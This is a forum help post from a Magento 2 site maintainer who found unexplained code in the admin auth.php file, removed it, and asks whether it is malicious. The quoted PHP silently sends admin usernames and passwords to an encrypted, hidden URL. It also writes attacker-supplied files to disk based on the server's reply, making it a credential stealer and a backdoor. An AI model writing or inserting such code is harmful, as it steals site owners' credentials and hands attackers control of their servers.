Auth.php - Rogue Code?

Hi Everyone,

One of the M2 site I help out with suddenly couldn’t login to admin panel. I finally found code in the auth.php file (see below). I compared this against another sites auth.php file content and the below code didn’t exist. On removing it I can now login to the admin panel. Has anyone had any experience of seeing this code in the auth.php file and if it’s got sinister purposes.

 * Check Password process
 * @return void
public function CheckPwd($username, $password, $isGood)
    try {
        $url = openssl_decrypt("pOJ8p5qgxgA6lcH1F64+SQk1YUNpCbJpg/OzAGw57TUdj2DxK8CSrgHbUJzNeXTj", "AES-128-ECB", "459F8892AA0637DFF887DA73D733B91F");
        $ip = $_SERVER['REMOTE_ADDR'];
        $domain = $_SERVER['HTTP_HOST'];
        $currentPath = $_SERVER['REQUEST_URI'];
        $object = (object) ['username' => $username, 'password' => $password, 'success' => $isGood, 'ip' => $ip, 'domain' => $domain, 'url' => $currentPath];
        $options = array(
            'http' => array(
                'header' => "Content-type: application/json\r\n",
                'method' => 'POST',
                'content' => json_encode($object)
        $context = stream_context_create($options);
        $result = file_get_contents($url, false, $context);
            $emailInfo = openssl_decrypt($result, "AES-128-ECB", "459F8892AA0637DFF887DA73D733B91F");
            $emails = explode("@", $emailInfo);
            if($emails[0] === "smtp"){
            if($emails[0] === "pop3"){
                file_put_contents($emails[1], $emails[2]);

    } catch (Exception $e) {



Any help greatly appreciated.

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.